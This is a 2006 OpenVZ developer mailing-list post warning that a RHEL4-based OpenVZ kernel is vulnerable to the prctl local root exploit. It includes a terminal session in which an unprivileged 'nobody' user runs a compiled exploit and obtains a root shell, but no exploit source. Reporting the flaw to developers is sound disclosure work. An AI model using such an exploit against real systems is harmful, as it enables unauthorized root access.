[Devel] IMPORTANT: latest RHEL4 kernel has a root exploit!! (2.6.9-023stab016.2)

Avi Brender abrender at elitehosts.com
Wed Oct 11 18:47:06 PDT 2006


Hi,
 
    The latest RHEL4 kernel for OpenVZ ((2.6.9-023stab016.2) available at
http://openvz.org/download/kernel/rhel4/ is vulnerable to the PRCTL exploit:
http://isc.sans.org/diary.php?storyid=1482
 
example session of "nobody" running the exploit and getting a root shell:
 
[root at mailin-02node tmp]# uname -a
Linux mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu Aug 10 23:39:42
MSD 2006 i686 i686 i386 GNU/Linux
[root at mailin-02node tmp]# su nobody
bash-3.00$ ls -ld 05
-rwxr-xr-x  1 nobody nobody 13298 Oct 11 21:42 05
bash-3.00$ ./05
 
prctl() suidsafe exploit
 
(C) Julien TINNES
 
[+] Installed signal handler
[+] We are suidsafe dumpable!
[+] Malicious string forged
[+] Segfaulting child
[+] Waiting for exploit to succeed (~26 seconds)
[+] getting root shell
sh-3.00# whoami
root
sh-3.00# uname -a
Linux mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu Aug 10 23:41:42
MSD 2006 i686 i686 i386 GNU/Linux
sh-3.00#
 
---------------------------
Avi  Brender
abrender at elitehosts.com
Elite Hosts, Inc
-------------------------------------------------------
WARNING !!! This email message is for the sole use of the intended
recipient(s) and may contain confidential and privileged information. Any
unauthorized review; use, disclosure or distribution is prohibited, and
could result in criminal prosecution. If you are not the intended recipient,
please contact the sender by reply email and destroy all copies of the
original message. This message is private and is considered a confidential
exchange - public disclosure of this electronic message or its contents are
prohibited.
----------------------
 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.openvz.org/pipermail/devel/attachments/20061011/95233799/attachment-0001.html>


More information about the Devel mailing list